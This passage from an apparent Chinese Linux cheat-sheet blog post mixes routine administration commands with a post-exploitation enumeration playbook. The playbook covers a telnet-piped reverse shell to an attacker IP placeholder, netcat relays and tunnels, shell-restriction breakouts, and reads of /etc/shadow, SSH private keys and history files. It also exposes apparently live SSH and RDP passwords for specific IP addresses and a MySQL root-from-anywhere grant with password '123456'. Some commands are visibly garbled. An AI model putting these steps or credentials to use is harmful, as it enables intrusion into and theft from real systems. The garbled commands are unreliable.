class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div class="line">217</div><div class="line">218</div><div class="line">219</div><div class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div><div class="line">289</div><div class="line">290</div><div class="line">291</div><div class="line">292</div><div class="line">293</div><div class="line">294</div><div class="line">295</div><div class="line">296</div><div class="line">297</div><div class="line">298</div><div class="line">299</div><div class="line">300</div><div class="line">301</div><div class="line">302</div><div class="line">303</div><div class="line">304</div><div class="line">305</div><div class="line">306</div><div class="line">307</div><div class="line">308</div><div class="line">309</div><div class="line">310</div><div class="line">311</div><div class="line">312</div><div class="line">313</div><div class="line">314</div><div class="line">315</div><div class="line">316</div><div class="line">317</div><div class="line">318</div><div class="line">319</div><div class="line">320</div><div class="line">321</div><div class="line">322</div><div class="line">323</div><div class="line">324</div><div class="line">325</div><div class="line">326</div><div class="line">327</div><div class="line">328</div><div class="line">329</div><div class="line">330</div><div class="line">331</div><div class="line">332</div><div class="line">333</div><div class="line">334</div><div class="line">335</div><div class="line">336</div><div class="line">337</div><div class="line">338</div><div class="line">339</div><div class="line">340</div><div class="line">341</div><div class="line">342</div><div class="line">343</div><div class="line">344</div><div class="line">345</div><div class="line">346</div><div class="line">347</div><div class="line">348</div><div class="line">349</div><div class="line">350</div><div class="line">351</div><div class="line">352</div><div class="line">353</div><div class="line">354</div><div class="line">355</div><div class="line">356</div><div class="line">357</div><div class="line">358</div><div class="line">359</div><div class="line">360</div><div class="line">361</div><div class="line">362</div><div class="line">363</div><div class="line">364</div><div class="line">365</div><div class="line">366</div><div class="line">367</div><div class="line">368</div><div class="line">369</div><div class="line">370</div><div class="line">371</div><div class="line">372</div><div class="line">373</div><div class="line">374</div><div class="line">375</div><div class="line">376</div><div class="line">377</div><div class="line">378</div><div class="line">379</div><div class="line">380</div><div class="line">381</div><div class="line">382</div><div class="line">383</div><div class="line">384</div><div class="line">385</div><div class="line">386</div><div class="line">387</div><div class="line">388</div><div class="line">389</div><div class="line">390</div><div class="line">391</div><div class="line">392</div><div class="line">393</div><div class="line">394</div><div class="line">395</div><div class="line">396</div><div class="line">397</div><div class="line">398</div><div class="line">399</div><div class="line">400</div><div class="line">401</div><div class="line">402</div><div class="line">403</div><div class="line">404</div><div class="line">405</div><div class="line">406</div><div class="line">407</div><div class="line">408</div><div class="line">409</div><div class="line">410</div><div class="line">411</div><div class="line">412</div><div class="line">413</div><div class="line">414</div><div class="line">415</div><div class="line">416</div><div class="line">417</div><div class="line">418</div><div class="line">419</div><div class="line">420</div><div class="line">421</div><div class="line">422</div><div class="line">423</div><div class="line">424</div><div class="line">425</div><div class="line">426</div><div class="line">427</div><div class="line">428</div><div class="line">429</div><div class="line">430</div><div class="line">431</div><div class="line">432</div><div class="line">433</div><div class="line">434</div><div class="line">435</div><div class="line">436</div><div class="line">437</div><div class="line">438</div><div class="line">439</div><div class="line">440</div><div class="line">441</div><div class="line">442</div><div class="line">443</div><div class="line">444</div><div class="line">445</div><div class="line">446</div><div class="line">447</div><div class="line">448</div><div class="line">449</div><div class="line">450</div><div class="line">451</div><div class="line">452</div><div class="line">453</div><div class="line">454</div><div class="line">455</div><div class="line">456</div><div class="line">457</div><div class="line">458</div><div class="line">459</div><div class="line">460</div><div class="line">461</div><div class="line">462</div><div class="line">463</div><div class="line">464</div><div class="line">465</div><div class="line">466</div><div class="line">467</div><div class="line">468</div><div class="line">469</div><div class="line">470</div><div class="line">471</div><div class="line">472</div><div class="line">473</div><div class="line">474</div><div class="line">475</div><div class="line">476</div><div class="line">477</div><div class="line">478</div><div class="line">479</div><div class="line">480</div><div class="line">481</div></pre></td><td class="code"><pre><div class="line"># 系统管理</div><div class="line">    fdisk fdisk -l 查看系统分区信息</div><div class="line">    fdisk fdisk /dev/sdb 为一块新的SCSI硬盘进行分区</div><div class="line">    chown chown root /home 把/home的属主改成root用户</div><div class="line">    chgrp chgrp root /home 把/home的属组改成root组</div><div class="line"></div><div class="line">    useradd 创建一个新的用户</div><div class="line">    groupadd 组名 创建一个新的组</div><div class="line">    passwd 用户名 为用户创建密码</div><div class="line">    passwd -d用户名 删除用户密码也能登陆</div><div class="line">    passwd -S用户名 查询账号密码</div><div class="line">    usermod -l 新用户名 老用户名 为用户改名</div><div class="line">    userdel–r 用户名 删除用户一切</div><div class="line"></div><div class="line">    service [servicename] start/stop/restart 系统服务控制操作</div><div class="line">    /etc/init.d/[servicename] start/stop/restart 系统服务控制操作</div><div class="line"></div><div class="line"># xshell上传下载：</div><div class="line">    sudo apt-get instal  lrzsz</div><div class="line">    上传：rz -E</div><div class="line">    下载：sz</div><div class="line"># ssh 22：</div><div class="line">    sudo apt-get install openssh-server</div><div class="line">    开启：sudo /etc/init.d/ssh restart</div><div class="line"># mysql开启远程连接：</div><div class="line">    mysql -u root -p</div><div class="line">    use mysql</div><div class="line">    GRANT ALL PRIVILEGES ON *.* TO &apos;root&apos;@&apos;%&apos; IDENTIFIED BY &apos;123456&apos; WITH GRANT OPTION;</div><div class="line">    flush privileges;</div><div class="line"># find 命令：</div><div class="line">    find .|xargs grep -ri &quot;IBM&quot;  查找目录下的所有文件中是否含有某个字符串,并且只打印出文件名</div><div class="line">    find /opt/  -name &quot;MyCProgram.c&quot;        用文件名查找文件</div><div class="line">    find /opt/  -iname &quot;MyCProgram.c&quot;        用文件名查找文件，忽略大小写</div><div class="line">    find /opt/ -maxdepth  3 -iname &quot;passwd&quot;    在opt目录下及其最大三层深度的子目录中查找passwd文件</div><div class="line">    find  /opt/ -maxdepth  3 -iname &quot;SBLF.php&quot; -exec cat  &#123;&#125; \  查找文件并查看</div><div class="line">    find /opt/  -not  -iname &quot;MyCProgram.c&quot;    相反匹配</div><div class="line">    find  /opt/ -perm 755  -type f  -exec ls -l &#123;&#125; \;  查找opt目录下755权限的文件并执行ls -l</div><div class="line">    find /opt/ -empty            查找所有的空文件</div><div class="line">    find /opt/lampp/htdocs/  -newer /opt/lampp/htdocs/Trojan/lqx.php    查找在指定文件时间之后做了修改的文件</div><div class="line"># 远程链接</div><div class="line">    1).linux</div><div class="line">        ssh ubuntu@115.159.50.234    密码:8KX3OuQkBhDRvE7</div><div class="line">    2).windows</div><div class="line">        rdesktop  115.159.100.36 -u Administrator -p 3GCGc7OoRn0kpMY7</div><div class="line"></div><div class="line"># 设置软连接</div><div class="line">    ln -s /usr/local/nginx/logs/access.log  nginx_access.log</div><div class="line"></div><div class="line"># make编译</div><div class="line">    make 编译</div><div class="line">    make install 安装编译好的源码包</div><div class="line"></div><div class="line"># apt命令</div><div class="line">    apt-cache search package 搜索包</div><div class="line">    apt-cache show package 获取包的相关信息，如说明、大小、版本等</div><div class="line">    sudo apt-get install package 安装包</div><div class="line">    sudo apt-get install package - - reinstall 重新安装包</div><div class="line">    sudo apt-get -f install 修复安装”-f = –fix-missing”</div><div class="line">    sudo apt-get remove package 删除包</div><div class="line">    sudo apt-get remove package - - purge 删除包，包括删除配置文件等</div><div class="line">    sudo apt-get update 更新源</div><div class="line">    sudo apt-get upgrade 更新已安装的包</div><div class="line">    sudo apt-get dist-upgrade 升级系统</div><div class="line">    sudo apt-get dselect-upgrade 使用 dselect 升级</div><div class="line">    apt-cache depends package 了解使用依赖</div><div class="line">    apt-cache rdepends package 是查看该包被哪些包依赖</div><div class="line">    sudo apt-get build-dep package 安装相关的编译环境</div><div class="line">    apt-get source package 下载该包的源代码</div><div class="line">    sudo apt-get clean &amp;&amp; sudo apt-get autoclean 清理无用的包</div><div class="line">    sudo apt-get check 检查是否有损坏的依赖</div><div class="line">    sudo apt-get clean 清理所有软件缓存（即缓存在/var/cache/apt/archives目录里的deb包）</div><div class="line">    sudo apt-get autoremove 删除系统不再使用的孤立软件</div><div class="line">    apt-get -qq –print-uris install ssh | cut -d\’ -f2 查看包在服务器上面的地址</div><div class="line"></div><div class="line"># 清除所以删除包的残余配置文件</div><div class="line">    dpkg -l |grep ^rc|awk ‘&#123;print $2&#125;’ |tr [&quot;\n&quot;] [&quot; “]|sudo xargs dpkg -P -</div><div class="line"></div><div class="line"># 查看安装软件时下载包的临时存放目录</div><div class="line">    ls /var/cache/apt/archives</div><div class="line"></div><div class="line"># 备份当前系统安装的所有包的列表</div><div class="line">    dpkg –get-selections | grep -v deinstall &gt; ~/somefile</div><div class="line"></div><div class="line"># 从上面备份的安装包的列表文件恢复所有包</div><div class="line">    dpkg –set-selections &lt; ~/somefile sudo dselect</div><div class="line"></div><div class="line"># 查看内核</div><div class="line">    uname -a</div><div class="line"></div><div class="line"># 查看Ubuntu版本</div><div class="line">    cat /etc/issue</div><div class="line"></div><div class="line"># 查看内核加载的模块</div><div class="line">    lsmod</div><div class="line"></div><div class="line"># 查看PCI设备</div><div class="line">    lspci</div><div class="line"></div><div class="line"># 查看USB设备</div><div class="line">    lsusb</div><div class="line"></div><div class="line"># 查看网卡状态</div><div class="line">    sudo ethtool eth0</div><div class="line"></div><div class="line"># 查看CPU信息</div><div class="line">    cat /proc/cpuinfo</div><div class="line"></div><div class="line"># 显示当前硬件信息</div><div class="line">    lshw</div><div class="line"></div><div class="line"># 查看硬盘的分区</div><div class="line">    sudo fdisk -l</div><div class="line"></div><div class="line"># 查看IDE硬盘信息</div><div class="line">    sudo hdparm -i /dev/hda</div><div class="line"></div><div class="line"># 查看STAT硬盘信息</div><div class="line">    sudo hdparm -I /dev/sda</div><div class="line">    sudo blktool /dev/sda id</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"># 如果你想在当前目录下 查找&quot;hello,world!&quot;字符串,可以这样:</div><div class="line"></div><div class="line">grep -rn &quot;hello,world!&quot; *</div><div class="line">* : 表示当前目录所有文件，也可以是某个文件名</div><div class="line">-r 是递归查找</div><div class="line">-n 是显示行号</div><div class="line">-R 查找所有文件包含子目录</div><div class="line">-i 忽略大小写</div><div class="line"></div><div class="line">下面是一些有意思的命令行参数：</div><div class="line">grep -i pattern files ：不区分大小写地搜索。默认情况区分大小写，</div><div class="line">grep -l pattern files ：只列出匹配的文件名，</div><div class="line">grep -L pattern files ：列出不匹配的文件名，</div><div class="line">grep -w pattern files ：只匹配整个单词，而不是字符串的一部分（如匹配‘magic’，而不是‘magical’），</div><div class="line">grep -C number pattern files ：匹配的上下文分别显示[number]行，</div><div class="line">grep pattern1 | pattern2 files ：显示匹配 pattern1 或 pattern2 的行，</div><div class="line">grep pattern1 files | grep pattern2 ：显示既匹配 pattern1 又匹配 pattern2 的行。</div><div class="line">这里还有些用于搜索的特殊符号：</div><div class="line">\&lt; 和 \&gt; 分别标注单词的开始与结尾。</div><div class="line"></div><div class="line">例如：</div><div class="line">grep man * 会匹配 ‘Batman’、‘manic’、‘man’等，</div><div class="line">grep &apos;\&lt;man&apos; * 匹配‘manic’和‘man’，但不是‘Batman’，</div><div class="line">grep &apos;\&lt;man\&gt;&apos; 只匹配‘man’，而不是‘Batman’或‘manic’等其他的字符串。</div><div class="line">&apos;^&apos;：指匹配的字符串在行首，</div><div class="line">&apos;$&apos;：指匹配的字符串在行尾， </div><div class="line"></div><div class="line">xargs配合grep查找</div><div class="line">find -type f -name &apos;*.php&apos;|xargs grep &apos;GroupRecord&apos;</div><div class="line">``</div><div class="line"></div><div class="line">## 信息收集</div><div class="line"></div><div class="line">``` bash </div><div class="line">系统是什么版本?</div><div class="line">cat /etc/issue</div><div class="line">cat /etc/*-release</div><div class="line">cat /etc/lsb-release</div><div class="line">cat /etc/redhat-release</div><div class="line"></div><div class="line">它的内核版本是什么？</div><div class="line">cat /proc/version </div><div class="line">uname -a</div><div class="line">uname -mrs</div><div class="line">rpm -q kernel</div><div class="line">dmesg | grep Linux</div><div class="line">ls /boot | grep vmlinuz</div><div class="line"></div><div class="line">它的环境变量里有些什么？</div><div class="line">cat /etc/profile</div><div class="line">cat /etc/bashrc</div><div class="line">cat ~/.bash_profile</div><div class="line">cat ~/.bashrc</div><div class="line">cat ~/.bash_logout</div><div class="line">env</div><div class="line">set</div><div class="line"></div><div class="line">是否有台打印机？</div><div class="line">lpstat -a</div><div class="line"></div><div class="line">应用与服务</div><div class="line"></div><div class="line">查看进程打开的文件</div><div class="line">lsof -p</div><div class="line"></div><div class="line">正在运行什么服务？什么样的服务具有什么用户权限？</div><div class="line">ps aux</div><div class="line">ps -ef</div><div class="line">top</div><div class="line">cat /etc/service</div><div class="line"></div><div class="line">哪些服务具有root的权限？这些服务里你看起来那些有漏洞,进行再次检查！</div><div class="line">ps aux | grep root</div><div class="line">ps -ef | grep root</div><div class="line"></div><div class="line">安装了哪些应用程序？他们是什么版本？哪些是当前正在运行的？</div><div class="line">ls -alh /usr/bin/</div><div class="line">ls -alh /sbin/</div><div class="line">dpkg -l</div><div class="line">rpm -qa</div><div class="line">ls -alh /var/cache/apt/archivesO</div><div class="line">ls -alh /var/cache/yum/</div><div class="line"></div><div class="line">Service设置，有任何的错误配置吗？是否有任何（脆弱的）的插件？</div><div class="line">cat /etc/syslog.conf</div><div class="line">cat /etc/chttp.conf</div><div class="line">cat /etc/lighttpd.conf</div><div class="line">cat /etc/cups/cupsd.conf</div><div class="line">cat /etc/inetd.conf</div><div class="line">cat /etc/apache2/apache2.conf</div><div class="line">cat /etc/my.conf</div><div class="line">cat /etc/httpd/conf/httpd.conf</div><div class="line">cat /opt/lampp/etc/httpd.conf</div><div class="line">ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/</div><div class="line"></div><div class="line">主机上有哪些工作计划？</div><div class="line">crontab -l</div><div class="line">ls -alh /var/spool/cron</div><div class="line">ls -al /etc/ | grep cron</div><div class="line">ls -al /etc/cron*</div><div class="line">cat /etc/cron*</div><div class="line">cat /etc/at.allow</div><div class="line">cat /etc/at.deny</div><div class="line">cat /etc/cron.allow</div><div class="line">cat /etc/cron.deny</div><div class="line">cat /etc/crontab</div><div class="line">cat /etc/anacrontab</div><div class="line">cat /var/spool/cron/crontabs/root</div><div class="line"></div><div class="line">主机上可能有哪些纯文本用户名和密码?</div><div class="line">grep -i user [filename]</div><div class="line">grep -i pass [filename]</div><div class="line">grep -C 5 &quot;password&quot; [filename]</div><div class="line">find . -name &quot;*.php&quot; -print0 | xargs -0 grep -i -n &quot;var $password&quot;   # Joomla</div><div class="line"></div><div class="line">通信与网络</div><div class="line">NIC(s)，系统有哪些？它是连接到哪一个网络？</div><div class="line">/sbin/ifconfig -a</div><div class="line">cat /etc/network/interfaces</div><div class="line">cat /etc/sysconfig/network</div><div class="line"></div><div class="line">网络配置设置是什么？网络中有什么样的服务器？DHCP服务器？DNS服务器？网关？</div><div class="line">cat /etc/resolv.conf</div><div class="line">cat /etc/sysconfig/network</div><div class="line">cat /etc/networks</div><div class="line">iptables -L</div><div class="line">hostname</div><div class="line">dnsdomainname</div><div class="line"></div><div class="line">其他用户主机与系统的通信？</div><div class="line">lsof -i</div><div class="line">lsof -i :80</div><div class="line">grep 80 /etc/services</div><div class="line">netstat -antup</div><div class="line">netstat -antpx</div><div class="line">netstat -tulpn</div><div class="line">chkconfig --list</div><div class="line">chkconfig --list | grep 3:on</div><div class="line">last</div><div class="line">w</div><div class="line"></div><div class="line">缓存？IP和/或MAC地址?</div><div class="line">arp -e</div><div class="line">route</div><div class="line">/sbin/route -nee</div><div class="line"></div><div class="line">数据包可能嗅探吗？可以看出什么？监听流量</div><div class="line">$ tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]</div><div class="line">$ tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21</div><div class="line"></div><div class="line">你如何get一个shell？你如何与系统进行交互？</div><div class="line"># http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/</div><div class="line">nc -lvp 4444    # Attacker. 输入 (命令)</div><div class="line">nc -lvp 4445    # Attacker. 输出(结果)</div><div class="line">telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # 在目标系统上. 使用 攻击者的IP!</div><div class="line"></div><div class="line">如何端口转发？（端口重定向）</div><div class="line"># rinetd</div><div class="line"># http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch</div><div class="line"># fpipe</div><div class="line"># FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]</div><div class="line">FPipe.exe -l 80 -r 80 -s 80 192.168.1.7</div><div class="line"># ssh</div><div class="line"># ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]</div><div class="line">ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port</div><div class="line">ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port</div><div class="line"></div><div class="line">#mknod</div><div class="line"># mknod backpipe p ; nc -l -p [remote port] &lt; backpipe  | nc [local IP] [local port] &gt;backpipe</div><div class="line">mknod backpipe p ; nc -l -p 8080 &lt; backpipe | nc 10.1.1.251 80 &gt;backpipe    # Port Relay</div><div class="line">mknod backpipe p ; nc -l -p 8080 0 &amp; &lt; backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1&gt;backpipe    # Proxy (Port 80 to 8080)</div><div class="line"></div><div class="line">mknod</div><div class="line">backpipe p ; nc -l -p 8080 0 &amp; &lt; backpipe | tee -a inflow | nc</div><div class="line">localhost 80 | tee -a outflow &amp; 1&gt;backpipe    # Proxy monitor (Port 80 to 8080)</div><div class="line"></div><div class="line">建立隧道可能吗？本地，远程发送命令</div><div class="line">ssh -D 127.0.0.1:9050 -N [username]@[ip]</div><div class="line">proxychains ifconfig</div><div class="line"></div><div class="line">mm信息和用户</div><div class="line">你是谁？哪个id登录？谁已经登录？还有谁在这里？谁可以做什么呢？</div><div class="line">id</div><div class="line">who</div><div class="line">w</div><div class="line">last</div><div class="line">cat /etc/passwd | cut -d:    # List of users</div><div class="line">grep -v -E &quot;^#&quot; /etc/passwd | awk -F: &amp;#039;$3 == 0 &#123; print $1&#125;&apos;   # List of super users</div><div class="line">awk -F: &apos;($3 == &quot;0&quot;) &#123;print&#125;&amp;#039; /etc/passwd   # List of super users</div><div class="line">cat /etc/sudoers</div><div class="line">sudo -l</div><div class="line"></div><div class="line">可以找到什么敏感文件？</div><div class="line">cat /etc/passwd</div><div class="line">cat /etc/group</div><div class="line">cat /etc/shadow</div><div class="line">ls -alh /var/mail/</div><div class="line"></div><div class="line">什么有趣的文件在home/directorie（S）里？如果有权限访问</div><div class="line">ls -ahlR /root/</div><div class="line">ls -ahlR /home/</div><div class="line"></div><div class="line">是否有任何密码，脚本，数据库，配置文件或日志文件？密码默认路径和位置</div><div class="line">cat /var/apache2/config.inc</div><div class="line">cat /var/lib/mysql/mysql/user.MYD</div><div class="line">cat /root/anaconda-ks.cfg</div><div class="line"></div><div class="line">用户做过什么？是否有任何密码呢？他们有没有编辑什么？</div><div class="line">cat ~/.bash_history</div><div class="line">cat ~/.nano_history</div><div class="line">cat ~/.atftp_history</div><div class="line">cat ~/.mysql_history</div><div class="line">cat ~/.php_history</div><div class="line"></div><div class="line">可以找到什么样的用户信息</div><div class="line">cat ~/.bashrc</div><div class="line">cat ~/.profile</div><div class="line">cat /var/mail/root</div><div class="line">cat /var/spool/mail/root</div><div class="line"></div><div class="line">private-key 信息能否被发现？</div><div class="line">cat ~/.ssh/authorized_keys</div><div class="line">cat ~/.ssh/identity.pub</div><div class="line">cat ~/.ssh/identity</div><div class="line">cat ~/.ssh/id_rsa.pub</div><div class="line">cat ~/.ssh/id_rsa</div><div class="line">cat ~/.ssh/id_dsa.pub</div><div class="line">cat ~/.ssh/id_dsa</div><div class="line">cat /etc/ssh/ssh_config</div><div class="line">cat /etc/ssh/sshd_config</div><div class="line">cat /etc/ssh/ssh_host_dsa_key.pub</div><div class="line">cat /etc/ssh/ssh_host_dsa_key</div><div class="line">cat /etc/ssh/ssh_host_rsa_key.pub</div><div class="line">cat /etc/ssh/ssh_host_rsa_key</div><div class="line">cat /etc/ssh/ssh_host_key.pub</div><div class="line">cat /etc/ssh/ssh_host_key</div><div class="line"></div><div class="line">文件系统</div><div class="line">哪些用户可以写配置文件在/ etc /？能够重新配置服务？</div><div class="line">ls -aRl /etc/ | awk ‘$1 ~ /^.*w.*/&apos; 2&gt;/dev/null     # Anyone</div><div class="line">ls -aRl /etc/ | awk ’$1 ~ /^..w/&apos; 2&gt;/dev/null        # Owner</div><div class="line">ls -aRl /etc/ | awk ‘$1 ~ /^.....w/&apos; 2&gt;/dev/null    # Group</div><div class="line">ls -aRl /etc/ | awk ’;$1 ~ /w.$/&apos; 2&gt;/dev/null          # Other</div><div class="line">find /etc/ -readable -type f 2&gt;/dev/null                         # Anyone</div><div class="line">find /etc/ -readable -type f -maxdepth 1 2&gt;/dev/null   # Anyone</div><div class="line"></div><div class="line">在/ var /有什么可以发现？</div><div class="line">ls -alh /var/log</div><div class="line">ls -alh /var/mail</div><div class="line">ls -alh /var/spool</div><div class="line">ls -alh /var/spool/lpd</div><div class="line">ls -alh /var/lib/pgsql</div><div class="line">ls -alh /var/lib/mysql</div><div class="line">cat /var/lib/dhcp3/dhclient.leases</div><div class="line"></div><div class="line">网站上的任何隐藏配置/文件?配置文件与数据库信息？</div><div class="line">ls -alhR /var/www/</div><div class="line">ls -alhR /srv/www/htdocs/</div><div class="line">ls -alhR /usr/local/www/apache22/data/</div><div class="line">ls -alhR /opt/lampp/htdocs/</div><div class="line">ls -alhR /var/www/html/</div><div class="line"></div><div class="line">有什么在日志文件里?（什么能够帮助到“本地文件包含”?)</div><div class="line"># http://www.thegeekstuff.com/2011/08/linux-var-log-files/</div><div class="line">cat /etc/httpd/logs/access_log</div><div class="line">cat /etc/httpd/logs/access.log</div><div class="line">cat /etc/httpd/logs/error_log</div><div class="line">cat /etc/httpd/logs/error.log</div><div class="line">cat /var/log/apache2/access_log</div><div class="line">cat /var/log/apache2/access.log</div><div class="line">cat /var/log/apache2/error_log</div><div class="line">cat /var/log/apache2/error.log</div><div class="line">cat /var/log/apache/access_log</div><div class="line">cat /var/log/apache/access.log</div><div class="line">cat /var/log/auth.log</div><div class="line">cat /var/log/chttp.log</div><div class="line">cat /var/log/cups/error_log</div><div class="line">cat /var/log/dpkg.log</div><div class="line">cat /var/log/faillog</div><div class="line">cat /var/log/httpd/access_log</div><div class="line">cat /var/log/httpd/access.log</div><div class="line">cat /var/log/httpd/error_log</div><div class="line">cat /var/log/httpd/error.log</div><div class="line">cat /var/log/lastlog</div><div class="line">cat /var/log/lighttpd/access.log</div><div class="line">cat /var/log/lighttpd/error.log</div><div class="line">cat /var/log/lighttpd/lighttpd.access.log</div><div class="line">cat /var/log/lighttpd/lighttpd.error.log</div><div class="line">cat /var/log/messages</div><div class="line">cat /var/log/secure</div><div class="line">cat /var/log/syslog</div><div class="line">cat /var/log/wtmp</div><div class="line">cat /var/log/xferlog</div><div class="line">cat /var/log/yum.log</div><div class="line">cat /var/run/utmp</div><div class="line">cat /var/webmin/miniserv.log</div><div class="line">cat /var/www/logs/access_log</div><div class="line">cat /var/www/logs/access.log</div><div class="line">ls -alh /var/lib/dhcp3/</div><div class="line">ls -alh /var/log/postgresql/</div><div class="line">ls -alh /var/log/proftpd/</div><div class="line">ls -alh /var/log/samba/</div><div class="line">#</div><div class="line"></div><div class="line">auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info,</div><div class="line">mail.log, mail.warn, messages, syslog, udev, wtmp(有什么文件?log.系统引导……)</div><div class="line"></div><div class="line">如果命令限制，你可以打出哪些突破它的限制？</div><div class="line">python -c &apos;import pty;pty.spawn(&quot;/bin/bash&quot;)&apos;</div><div class="line">echo os.system(&apos;/bin/bash&apos;)</div><div class="line">/bin/sh -i</div><div class="line"></div><div class="line">如何安装文件系统？</div><div class="line">mount</div><div class="line">df -h</div><div class="line"></div><div class="line">是否有挂载的文件系统？</div><div class="line">cat /etc/fstab</div><div class="line"></div><div class="line">什么是高级Linux文件权限使用？Sticky bits, SUID 和GUID</div><div class="line">find / -perm -1000 -type d 2&gt;/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here</div><div class="line">find / -perm -g=s -type f 2&gt;/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.</div><div class="line">find / -perm -u=s -type f 2&gt;/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.</div><div class="line">find / -perm -g=s -o -perm -u=s -type f 2&gt;/dev/null    # SGID or SUID</div><div class="line">for i in `locate -r &quot;bin$&quot;`; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2&gt;/dev/null; done    #</div><div class="line">Looks in &amp;#039;common&amp;#039; places: /bin, /sbin, /usr/bin, /usr/sbin,</div><div class="line">/usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID</div><div class="line">(Quicker search)</div><div class="line">#</div><div class="line">findstarting at root (/), SGIDorSUID, not Symbolic links, only 3</div><div class="line">folders deep, list with more detail and hideany errors (e.g. permission</div><div class="line">denied)</div><div class="line">find/-perm -g=s-o-perm -4000! -type l-maxdepth 3 -exec ls -ld &#123;&#125; ;2&gt;/dev/null</div><div class="line"></div><div class="line">在哪些目录可以写入和执行呢？几个“共同”的目录：/ tmp目录，/var / tmp目录/ dev /shm目录</div><div class="line">find / -writable -type d 2&gt;/dev/null        # world-writeable folders</div><div class="line">find / -perm -222 -type d 2&gt;/dev/null      # world-writeable folders</div><div class="line">find / -perm -o+w -type d 2&gt;/dev/null    # world-writeable folders</div><div class="line">find / -perm -o+x -type d 2&gt;/dev/null    # world-executable folders</div><div class="line">find / ( -perm -o+w -perm -o+x ) -type d 2&gt;/dev/null   # world-writeable &amp; executable folders</div><div class="line">Any &quot;problem&quot; files？可写的的，“没有使用&quot;的文件</div><div class="line">find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print   # world-writeable files</div><div class="line">find /dir -xdev ( -nouser -o -nogroup ) -print   # Noowner files</div><div class="line"></div><div class="line">准备和查找漏洞利用代码</div><div class="line"></div><div class="line">安装了什么开发工具/语言/支持？</div><div class="line">find / -name perl*</div><div class="line">find / -name python*</div><div class="line">find / -name gcc*</div><div class="line">find / -name cc</div><div class="line"></div><div class="line">如何上传文件？</div><div class="line">find / -name wget</div><div class="line">find / -name nc*</div><div class="line">find / -name netcat*</div><div class="line">find / -name tftp*</div><div class="line">find / -name ftp</div></pre></td></tr></table></figure>
<h2 id="安全检查"><a href="#安全检查" class="headerlink" title="安全检查"></a>安全检查</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line"># 查看指定端口的pid</div><div class="line">    netstat -antup | grep 5001</div><div class="line"># 杀死指定pid 进程</div><div class="line">    kill -9 12312</div><div class="line"></div><div class="line"># 创建新用户 orleven</div><div class="line">$ useradd orleven</div><div class="line"></div><div class="line"># 新用户允许使用sudo</div><div class="line">$ chmod u+w /etc/sudoers</div><div class="line">$ vi /etc/sudoers</div><div class="line">    找到这行 root ALL=(ALL:ALL) ALL,在他下面添加xxx ALL=(ALL) ALL (这里的xxx是你的用户名)</div><div class="line">$ chmod u-w /etc/sudoers</div><div class="line"></div><div class="line"># 生产机器禁止ROOT远程SSH登录：</div><div class="line">$ vi /etc/ssh/sshd_config</div><div class="line">    PermitRootLogin 